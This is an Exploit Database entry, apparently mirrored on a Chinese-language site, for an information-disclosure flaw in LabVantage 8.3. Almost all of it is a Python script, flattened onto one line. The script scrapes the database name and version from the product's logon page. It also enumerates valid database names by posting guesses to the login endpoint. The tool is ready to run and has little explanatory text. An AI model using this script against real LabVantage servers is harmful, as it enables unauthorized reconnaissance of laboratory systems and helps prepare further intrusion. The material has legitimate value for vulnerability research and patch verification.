LabVantage 8.3 – Information Disclosure

• Exploit Database
• 101 阅读

• 作者： Joel Aviad Ossi
  日期： 2020-02-17
• 类别：

  • webapps
  平台：

  • java
• 来源：https://www.exploit-db.com/exploits/48090/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71

  # Exploit Title: LabVantage 8.3 - Information Disclosure # Google Dork: N/A # Date: 2020-02-16 # Exploit Author: Joel Aviad Ossi # Vendor Homepage: labvantage.com # Software Link: N/A # Version: LabVantage 8.3 # Tested on: * # CVE : N/A     import requests import operator     def exploit(target): print("[+] Fetching LabVantage Database Name..") start = "name=\"database\" id=\"database\" value=\"" end = "\" >" vstart = "<img src=\"WEB-OPAL/layouts/images/logo_white.png\" title=\"" vend = "viewportTest" print("[+] Testing URL: " + target) r = requests.get(target) memory = r.text print("[+] DB: " + memory[memory.find(start) + len(start):memory.rfind(end)]) print("[+] VERSION: " + memory[memory.find(vstart) + len(vstart):memory.rfind(vend)][:-71]) print("[+] Vulnerable!")     def vuln_check(): target = input("\nTARGET HOST URL (example: target.com:8080): ") print('[+] Checking if Host is vulnerable.') target = (str(target) + "/labservices/logon.jsp") r = requests.get(target) memory = r.text s = "name=\"database\" id=\"database\" value=\"" if not operator.contains(memory, s): print("[-] Not Vulnerable!") exit(0) else: exploit(target)     def attack(): target = input("\nTARGET HOST URL (example: http://target.com:8080): ") enum = input("\nDB NAME TO CHECK: ") headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:72.0) Gecko/20100101 Firefox/72.0', 'Content-Type': 'application/x-www-form-urlencoded'} payload = ({'nexturl': 'null', 'ignorelogonurl': 'N', 'ignoreexpirywarning': 'false', '_viewport': 'null', 'username': 'null', 'password': 'null', 'database': ''+str(enum)+'', 'csrftoken': 'null'}) target = (str(target) + "/labservices/rc?command=login") print("[+] Testing URL: " + target) r = requests.post(target, headers=headers, data=payload) memory = r.text start = "Unrecognized" if start in memory: print('[+] DB NOT FOUND!') else: print('[!] NO FOUND!')     print("\n1. Vulnerability Check\n2. DB Name Enumeration\n") option = input("CHOSE OPTION: ") if option == "1": vuln_check() elif option == "2": attack() else: print("Wrong option selected, try again!")